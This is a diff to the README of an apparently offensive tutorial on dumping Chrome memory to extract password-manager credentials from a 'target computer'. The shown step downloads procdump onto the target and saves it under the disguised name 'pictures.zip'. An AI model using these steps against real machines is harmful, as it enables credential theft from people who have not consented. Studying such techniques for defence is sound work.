Cavan-M/ChromeExtension-PasswordManagerDump/README.md

  - The Target computer has an internet connection

 ## Step 1: Get a Debugger to Copy Chrome Memory
 For this tutorial I'm going to use procdump, it's quite compact and doesn't require an installer, so it is perfect for this scenario.
-On the host computer, run the command:
+On the target computer, run the command:

     curl https://download.sysinternals.com/files/Procdump.zip -o pictures.zip